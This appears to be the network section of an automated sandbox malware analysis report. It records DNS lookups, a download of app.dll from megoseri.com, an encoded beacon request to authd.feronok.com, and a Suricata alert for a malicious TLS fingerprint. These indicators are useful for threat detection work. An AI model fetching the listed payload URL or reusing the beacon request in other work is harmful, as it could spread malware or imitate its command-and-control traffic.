Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
authd.feronok.com | 35.199.86.111 | |
megoseri.com | 146.0.72.81 |
- UDP Requests
-
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
8.8.8.8:53 192.168.56.101:59369
-
GET
200
https://megoseri.com/app.dll
REQUEST
RESPONSE
BODY
GET /app.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: megoseri.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jun 2021 08:18:11 GMT
Content-Type: application/x-msdos-program
Content-Length: 698368
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Mon, 31 May 2021 13:16:47 GMT
ETag: "aa800-5c3a009a49a37"
Accept-Ranges: bytes
GET
404
http://authd.feronok.com/Y_2Bxq_2FCq_2/F7MtFfN9/OaOiUxVKaMBar_2Bwadu9JI/5f2JIT1R6z/wqyp5OYH26_2FCxoz/4cOT1gafxSEk/1G5XsW988_2/BjdSRlF7L4UAwI/jcsnuDJ33Fm5LZiPOHvvA/PAjjFqU39DDThmrZ/eR22M_2Fe0ePvSa/5l4TtOyHif5dcS9VgY/EtNp35w6x/i4xoaI04WasHjLAOvTF6/tc4VmpY6u_2F8heA9cW/KMPn27BMSv_2B3g7Hp4Ztp/SRUmhDBdfjn5m/rRGd_2Bb/Kx_2FAWnV71TDHDIMbMeb_2/BNfwSQhYk9/_2Fu_2BOoxOVDOIkf/D2gC2K1i
REQUEST
RESPONSE
BODY
GET /Y_2Bxq_2FCq_2/F7MtFfN9/OaOiUxVKaMBar_2Bwadu9JI/5f2JIT1R6z/wqyp5OYH26_2FCxoz/4cOT1gafxSEk/1G5XsW988_2/BjdSRlF7L4UAwI/jcsnuDJ33Fm5LZiPOHvvA/PAjjFqU39DDThmrZ/eR22M_2Fe0ePvSa/5l4TtOyHif5dcS9VgY/EtNp35w6x/i4xoaI04WasHjLAOvTF6/tc4VmpY6u_2F8heA9cW/KMPn27BMSv_2B3g7Hp4Ztp/SRUmhDBdfjn5m/rRGd_2Bb/Kx_2FAWnV71TDHDIMbMeb_2/BNfwSQhYk9/_2Fu_2BOoxOVDOIkf/D2gC2K1i HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: authd.feronok.com
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 01 Jun 2021 08:19:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49204 -> 146.0.72.81:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49204 146.0.72.81:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=megoseri.com | a1:e6:eb:af:ab:3b:16:6b:5b:f9:03:bb:de:b0:1a:99:e1:32:43:f5 |
Snort Alerts
No Snort Alerts